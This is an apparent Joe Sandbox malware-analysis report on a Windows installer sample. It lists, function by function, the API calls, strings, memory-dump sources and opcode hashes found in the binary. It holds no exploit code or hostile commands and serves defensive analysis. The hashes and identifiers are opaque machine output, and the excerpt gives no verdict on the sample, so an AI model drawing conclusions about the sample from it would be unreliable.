                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ActiveChangeNotifyWindow
                                                              • String ID: $Need to restart Windows? %s
                                                              • API String ID: 1160245247-4200181552
                                                              • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                              • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                              • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                              • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                              APIs
                                                                • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                              • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ChangeNotify$ErrorFullLastNamePath
                                                              • String ID: Creating directory: %s
                                                              • API String ID: 2451617938-483064649
                                                              • Opcode ID: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                              • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                              • Opcode Fuzzy Hash: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                              • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressByteCharMultiProcWide
                                                              • String ID: SfcIsFileProtected$sfc.dll
                                                              • API String ID: 2508298434-591603554
                                                              • Opcode ID: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                              • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                              • Opcode Fuzzy Hash: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                              • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                              APIs
                                                              • 73A1A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                              • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                              • 73A1A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A480A570ObjectSelect
                                                              • String ID: k H
                                                              • API String ID: 1230475511-1447039187
                                                              • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                              • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                              • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                              • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
                                                              • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
                                                              • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: DrawText$ByteCharMultiWide
                                                              • String ID: k H
                                                              • API String ID: 65125430-1447039187
                                                              • Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                              • Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
                                                              • Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                              • Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
                                                              APIs
                                                              • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 395431579-1506664499
                                                              • Opcode ID: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                              • Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
                                                              • Opcode Fuzzy Hash: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                              • Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
                                                              Strings
                                                              • PendingFileRenameOperations2, xrefs: 00455A3B
                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
                                                              • PendingFileRenameOperations, xrefs: 00455A2C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                              • API String ID: 47109696-2115312317
                                                              • Opcode ID: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                              • Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
                                                              • Opcode Fuzzy Hash: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                              • Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                              • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                              • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                              • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                              • Opcode Fuzzy Hash: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                              • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                              APIs
                                                              • GetMenu.USER32(00000000), ref: 00421371
                                                              • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                              • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                              • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Menu
                                                              • String ID:
                                                              • API String ID: 3711407533-0
                                                              • Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                              • Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
                                                              • Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                              • Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
                                                              APIs
                                                              • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                              • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                              • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Color$CallMessageProcSendTextWindow
                                                              • String ID:
                                                              • API String ID: 601730667-0
                                                              • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                              • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                              • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                              • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                              APIs
                                                              • 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                              • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                              • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                              • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A24620A480A570EnumFonts
                                                              • String ID:
                                                              • API String ID: 2630238358-0
                                                              • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                              • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                              • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                              • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                              APIs
                                                                • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                              • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                              Strings
                                                              • EndOffset range exceeded, xrefs: 0045C731
                                                              • NumRecs range exceeded, xrefs: 0045C6FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlush
                                                              • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                              • API String ID: 3593489403-659731555
                                                              • Opcode ID: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                              • Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
                                                              • Opcode Fuzzy Hash: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                              • Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
                                                              APIs
                                                                • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                • Part of subcall function 00409B88: 6F551CD0.COMCTL32(0049859A), ref: 00409B88
                                                                • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
                                                                • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
                                                                • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
                                                              • SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
                                                                • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                              • ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
                                                                • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                              • String ID: Setup
                                                              • API String ID: 3870281231-3839654196
                                                              • Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                              • Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
                                                              • Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                              • Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: .tmp
                                                              • API String ID: 1375471231-2986845003
                                                              • Opcode ID: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                              • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                              • Opcode Fuzzy Hash: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                              • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                              APIs
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
